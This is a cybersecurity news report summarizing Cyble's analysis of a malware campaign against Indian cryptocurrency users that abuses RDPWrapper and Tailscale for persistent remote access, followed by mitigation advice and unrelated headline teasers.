A new sophisticated campaign has been discovered targeting individuals involved in the cryptocurrency market. This campaign utilizes a multi-stage approach, primarily leveraging RDPWrapper and Tailscale to facilitate unauthorized access and establish control over victim systems.
The attack begins with a malicious Zip file containing a shortcut (.lnk) file. Upon execution, this shortcut triggers a PowerShell script download from a remote server, initiating a sequence of actions designed to compromise the victim’s system. Notably, the PowerShell script is obfuscated to evade detection mechanisms.
The campaign involves several malicious components, including PowerShell scripts, batch files, Go-based binaries, and exploits targeting a vulnerable driver known as Terminator (Spyboy). Although Terminator was not immediately activated during initial infections, its potential use highlights the threat actor’s intent to escalate privileges post-infection.
According to Cyble Research and Intelligence Labs (CRIL), a unique aspect of this campaign is the exploitation of legitimate tools such as RDPWrapper and Tailscale. RDPWrapper enables multiple Remote Desktop Protocol (RDP) sessions per user, circumventing the default Windows restriction of one session per PC. This capability allows threat actors to maintain persistent access to compromised systems discreetly.
Tailscale, on the other hand, is employed by threat actors to establish a secure, private network connection. By configuring Tailscale, attackers add the victim’s machine as a node on their private network, facilitating remote command execution and data exfiltration without direct visibility from conventional network security measures.
The attackers have tailored their approach with geographic and industry-specific targeting in mind. Evidence suggests a focus on Indian users within the cryptocurrency ecosystem, as indicated by the deployment of a decoy PDF related to cryptocurrency futures trading on CoinDCX, a prominent Indian exchange platform.
Following initial infection, the malware drops and executes a Go-based loader that performs anti-virtualization and anti-debugging checks. It then downloads additional payloads, including GoDefender (adr.exe) and potentially malicious drivers like Terminator.sys. These payloads are designed to evade detection and enhance control over the compromised system.
Furthermore, the malware configures the system to allow for multiple concurrent RDP sessions using RDPWrapper. It also manipulates system registries and installs software like Tailscale to maintain persistent access and facilitate further malicious activities.
Once established, RDP access grants threat actors significant control over compromised devices. They can execute commands, deploy ransomware, exfiltrate sensitive data, or pivot to other systems within the network, potentially causing severe operational and financial damage.
Cyble’s investigation revealed similarities between this campaign and previous incidents involving the StealC malware strain. The reuse of the same decoy PDF and attack techniques suggests a common threat actor behind these operations, possibly targeting cryptocurrency users with varying attack vectors.
To mitigate the risks of sophisticated cyber campaigns targeting cryptocurrency users, Cyble recommends proactive measures. Monitoring should include detection of base64-encoded PowerShell scripts and unauthorized software installations like RDP wrappers.
Enhanced security configurations involve strengthening UAC settings, monitoring Defender exclusion paths, and implementing strong authentication for RDP sessions. Network segmentation is crucial to isolate critical systems and minimize the impact of potential compromises.
Threat actors exploit tools such as RDPWrapper and Tailscale to evade detection and maintain persistent access, posing significant operational and financial risks. Maintaining vigilance, implementing proactive security measures, and staying updated with threat intelligence are essential to effectively defend against these advanced cyber threats in today’s digital environment.
This week’s The Cyber Express roundup covers ransomware, AI risks, geopolitical threats, and key developments in global cybersecurity news.
DeepSeek changed the calculation. When the House Select Committee on China concluded in early 2025 that the Chinese AI company…
The Apple age verification measures align with broader enforcement efforts under the UK’s online safety framework.
EU and ENISA act to protect the bedrock cyber vulnerability CVE Program after funding concerns raise risks of fragmentation and…
Energy sector ransomware surged in 2025 as ransomware groups exploited vulnerabilities and used FrostyGoop malware to disrupt infrastructure.
Reporting mechanisms for illegal content are also part of the Digital Services Act child protection investigation.
This website uses cookies. By continuing to use this website you are giving consent to cookies being used.
Read More